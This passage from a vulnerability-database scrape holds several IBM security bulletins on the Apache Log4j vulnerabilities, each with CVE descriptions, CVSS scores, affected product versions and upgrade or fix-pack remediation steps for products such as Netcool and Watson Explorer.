["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-27T21:21:42", "id": "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "href": "https://www.ibm.com/support/pages/node/6540566", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:03", "description": "## Summary\n\nMultiple vulnerabilities were identified within the Apache Log4j library (CVE-2021-45046, CVE-2021-45105) that is used by Netcool Operations Insight to provide logging functionality.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nNetcool Operations Insight| 1.4 \nNetcool Operations Insight| 1.5 \nNetcool Operations Insight| 1.6 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now. **\n\nPlease take careful inventory of components downloaded at any time and be sure to apply the remediations for any component that may have been installed whether or not it is currently in use.\n\nTo address the recent Apache Log4j vulnerabilities, **all** installed components must upgraded.\n\n**Redhat Openshift Platform**\n\nIf you are on a version between 1.4 and 1.6.2 move to IBM Netcool Operations Insight V1.6.3 on Red Hat OpenShift.\n\n<https://www.ibm.com/support/knowledgecenter/en/SSTPTP_1.6.3/com.ibm.netcool_ops.doc/soc/integration/task/soc_int_upgrade_cloud.html>\n\nInstall the recommended fix v1.6.3.2 as per\n\n<https://www.ibm.com/support/pages/node/6527810>\n\nThe fix includes Apache Log4j 2.17.1. \n \n--- \n \n**Traditional On Premise**\n\n| \n\n** **\n\n| \n---|---|--- \n**On Premise Component Product**| **IBM Netcool Operations Insight Version(s)**| **Remediation Steps** \n \nIBM Netcool Agile Service Manager\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6549838> \"Security Bulletin: IBM Netcool Agile Service Manager is vulnerable to arbitrary code execution and denial of service due to Apache Log4j \\(CVE-2021-44832, CVE-2021-45046, CVE-2021-45105\\)\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Cognos Analytics\n\n| \n\n1.6\n\n| \n\nPlease see steps for Bundled Customers in the Remediation section of [Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538720> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Db2\n\n| \n\n1.4-1.6\n\n| \n\nSee[ Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-45046, CVE-2021-45105\\)\" )\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Jazz for Service Management| 1.4-1.6| \n\nSee [Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities(CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6536710> \"Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerabilities\\(CVE-2021-45105, CVE-2021-45046\\)\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerability (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6539412> \"Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerability \\(CVE-2021-44832\\)\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Tivoli Netcool Impact| 1.4-1.6| \n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact (CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6538694> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact \\(CVE-2021-45105, CVE-2021-45046\\)\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538696>)\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Netcool/Omnibus| 1.4-1.6| \n\nSee [Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6552546> \"Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code \\(CVE-2021-44832, CVE-2021-45046, CVE-2021-45105\\)\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Tivoli Netcool/OMNIbus Probes and Gateways| 1.4-1.6| \n\nSee [Netcool/OMINbus Integrations Release Notice - Transport Module Common Integration Library](<https://www.ibm.com/support/pages/node/256461?myns=swgtiv&mynp=OCSSSHTQ&mync=E&cm_sp=swgtiv-_-OCSSSHTQ-_-E> \"Netcool/OMINbus Integrations Release Notice - Transport Module Common Integration Library\" )\n\nand\n\n[Netcool/OMNIbus Integrations Release Notice - Java Netcool Utility Library](<https://www.ibm.com/support/pages/node/255019?myns=swgtiv&mynp=OCSSSHTQ&mync=E&cm_sp=swgtiv-_-OCSSSHTQ-_-E> \"Netcool/OMNIbus Integrations Release Notice - Java Netcool Utility Library\" )\n\nThese include Apache Log4j 2.17.1. \n \nIBM Tivoli Netcool/OMNIbus Web GUI\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: IBM Tivoli Netcool/OMNIbus Web GUI is vulnerable to multiple Apache Log4j vulnerabilities (CVE-2021-45046,CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6537564> \"Security Bulletin: IBM Tivoli Netcool/OMNIbus Web GUI is vulnerable to multiple Apache Log4j vulnerabilities \\(CVE-2021-45046,CVE-2021-45105\\)\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Network Performance Insight\n\n| \n\n1.6.0-1.6.2\n\n| \n\nThere is an interim fix available on FixCentral at [(1.3.1.0-TIV-NPI-IF0005)](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.3.1.0-TIV-NPI-IF0005&source=SAR&function=fixId&parent=ibm/Tivoli> \"\\(1.3.1.0-TIV-NPI-IF0005\\)\" )\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Operations Analytics - Log Analysis\n\n| \n\n1.4-1.6\n\n| \n\nSee [Security Bulletin: Log4j remote code execution vulnerability in Apache Solr and Logstash shipped with IBM Operations Analytics - Log Analysis (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6527250>)\n\nIf Apache Log4j CVE-2021-44228 has already been addressed by executing the steps documented in the bulletin above, they do not have to be duplicated.\n\nThis includes Apache Log4j 2.17.0. \n \nIBM Operations Analytics - Predictive Insights| 1.4-1.6| \n\nSee [Security Bulletin: A vulnerability in Apache log4j (CVE-2021-45105) affects IBM Operations Analytics Predictive Insights](<https://www.ibm.com/support/pages/node/6541268> \"Security Bulletin: A vulnerability in Apache log4j \\(CVE-2021-45105\\) affects IBM Operations Analytics Predictive Insights\" )\n\nThis includes Apache Log4j 2.17.1. \n \nIBM Tivoli Business Service Manager (TBSM)| 1.4-1.6| \n\nFor IBM Tivoli Netcool Impact:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact (CVE-2021-45105, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6538694> \"Security Bulletin: Multiple vulnerabilities in Apache Log4j affect IBM Tivoli Netcool Impact \\(CVE-2021-45105, CVE-2021-45046\\)\" )\n\nThis includes Apache Log4j 2.17.0.\n\nA further update is available\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538696>)\n\nThis includes Apache Log4j 2.17.1.\n\n________________________________________________________\n\nFor Websphere Application Server:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server.\n\n________________________________________________________\n\nIf Apache Log4j CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 have already been addressed by executing the steps documented in the bulletins above relating to those components, they do not have to be duplicated. \n \nIBM Tivoli Netcool Configuration Manager| 1.4-1.6| \n\nFor Websphere Application Server:\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server.\n\n________________________________________________________\n\nIf Apache Log4j CVE-2021-45105 and CVE-2021-44832 have already been addressed by executing the steps documented in the bulletin above relating to the component, they do not have to be duplicated. \n \nIBM Tivoli Network Manager IP Edition| 1.4-1.6| \n\nSee [Interim Fix 4.2.0.14-TIV-ITNMIP-LinuxAll-IF1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FTivoli+Network+Manager+IP+Edition&fixids=4.2.0.14-TIV-ITNMIP-LinuxAll-IF1&source=SAR> \"Interim Fix 4.2.0.14-TIV-ITNMIP-LinuxAll-IF1\" )\n\nand follow instructions in ReadMe to remediate.\n\nThis includes Apache Log4j 2.17.1. \n \nIBM WebSphere Application Server| 1.4-1.6| \n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server. \n \n## Workarounds and Mitigations\n\n**Redhat Openshift Platform**\n\nNone.\n\n**Traditional On Premise**\n\nNone except as described in the individual on premise component security bulletins in the Remediation/Fixes table above.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T10:51:19", "type": "ibm", "title": "Security Bulletin: Netcool Operations Insight is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-09T10:51:19", "id": "37EB0FBFC18EAA8CBA405BA4A0486007287891F661D591E70F8DFD893065763F", "href": "https://www.ibm.com/support/pages/node/6554808", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:05", "description": "## Summary\n\nApache Log4j is used by IBM Watson Explorer to log system events for diagnostics. This bulletin provides a remediation for the security vulnerabilities (CVE-2021-44832, CVE-2021-45105, and CVE-2021-45046) by upgrading IBM Watson Explorer to Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| \n\n12.0.0.0, 12.0.0.1\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2,\n\n12.0.3.0 - 12.0.3.8 \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12 \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3 \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2 \n \n\n\n## Remediation/Fixes\n\n**Affected Products**| **Affected Versions**| **How to acquire and apply the fix** \n---|---|--- \nIBM Watson Explorer Deep Analytics Edition Foundational Components| \n\n12.0.0.0,\n\n12.0.1,\n\n12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8\n\n| Upgrade to Version 12.0.3.9. \n\nSee [Watson Explorer Version 12.0.3.9 Foundational Components](<https://www.ibm.com/support/pages/node/6539806>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition Analytical Components| 12.0.0.0, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 Analytical Components](<https://www.ibm.com/support/pages/node/6539808>) for download information and instructions. \n \nIBM Watson Explorer Deep Analytics Edition oneWEX| 12.0.0.0, 12.0.0.1, 12.0.1, 12.0.2.0 - 12.0.2.2, 12.0.3.0 - 12.0.3.8| \n\nUpgrade to Version 12.0.3.9. \n \nSee [Watson Explorer Version 12.0.3.9 oneWEX](<https://www.ibm.com/support/pages/node/6539804>) for download information and instructions. \n \nIBM Watson Explorer \nFoundational Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n\nSee [Watson Explorer Version 11.0.2.13 Foundational Components](<https://www.ibm.com/support/pages/node/6539814>) for download information and instructions. \n \nIBM Watson Explorer Analytical Components| 11.0.0.0 - 11.0.0.3, \n11.0.1, \n11.0.2.0 - \n11.0.2.12| \n\nUpgrade to Version 11.0.2.13. \n \nSee [Watson Explorer Version 11.0.2.13 Analytical Components](<https://www.ibm.com/support/pages/node/6539816>) for download information and instructions. \n \nIBM Watson Explorer Content Analytics Studio| 12.0.0, 12.0.1, 12.0.2, 12.0.3| \n\n 1. If you have not already installed, install Version 12.0.3. For information about Version 12.0.3, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/docview.wss?uid=ibm10880811>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=12.0.3.0&platform=All&function=all>): **12.0.3.0-WS-WatsonExplorer-DAEAnalytical-CAStudio-IF002.**\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \nIBM Watson Explorer Content Analytics Studio| 11.0.0.0 - 11.0.0.3, \n11.0.1, 11.0.2.0 - 11.0.2.2| \n\n 1. If you have not already installed, install Version 11.0.2.2. \n\n * For information about Version 11.0.2, and links to the software and release notes, see the [download document](<https://www.ibm.com/support/pages/node/724425>).\n * For information about upgrading, see the [upgrade procedures](<http://www.ibm.com/support/docview.wss?uid=swg27049072>).For information about Version 11.0.2.2, see the [download document](<http://www.ibm.com/support/docview.wss?uid=swg24044331>).\n 2. Download the interim fix from [Fix Central](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Watson%2BGroup&product=ibm/Information+Management/InfoSphere+Data+Explorer&release=11.0.2.2&platform=All&function=all>): **11.0.2.2-WS-WatsonExplorer-AEAnalytical-CAStudio-IF002**.\n 3. To apply the fix, follow the steps below. \n\n 1. Delete `%CA_STUDIO_INSTALL_DIR%\\plugins\\com.hp.hpl.jena_2.11.0` folder\n 2. Extract the interim fix zip file to the `%CA_STUDIO_INSTALL_DIR%\\plugins` folder\n 3. Run command `%CA_STUDIO_INSTALL_DIR%\\studio.exe -clean` in Command Prompt \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T12:14:51", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM Watson Explorer is vulnerable to arbitrary code execution (CVE-2021-44832, CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T12:14:51", "id": "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "href": "https://www.ibm.com/support/pages/node/6540528", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:25", "description": "## Summary\n\nIBM Sterling Secure Proxy is vulnerable to arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Sterling Secure Proxy| 6.0.2 \nIBM Sterling Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus Build 446| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \nIBM Sterling Secure Proxy| 6.0.2.0| iFix 04 Plus Build 232| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 6.0.3.0| iFix 01 Plus Build 142| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \n \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link also points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:05:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling Secure Proxy (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:05:15", "id": "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "href": "https://www.ibm.com/support/pages/node/6538674", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:11", "description": "## Summary\n\nThe Netcool/Omnibus 'Administrator GUI' and 'Operator GUI' desktop components use a version of Apache Log4j that contains known vulnerabilities. These vulnerabilities have been addressed by an upgrade to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nNetcool/OMNIbus| 8.1.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability by applying the fix below: \n\n**_Product_**| **_VRMF_**| **_APAR_**| _ **Remediation/Fix** \n_ \n---|---|---|--- \nOMNIbus| 8.1.0.28| IJ36852| <https://www.ibm.com/support/pages/node/6527268> \n \n## Workarounds and Mitigations\n\nIBM recommends installing Tivoli Netcool/OMNIbus 8.1.0 fix pack 8.0.1.28 or later.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 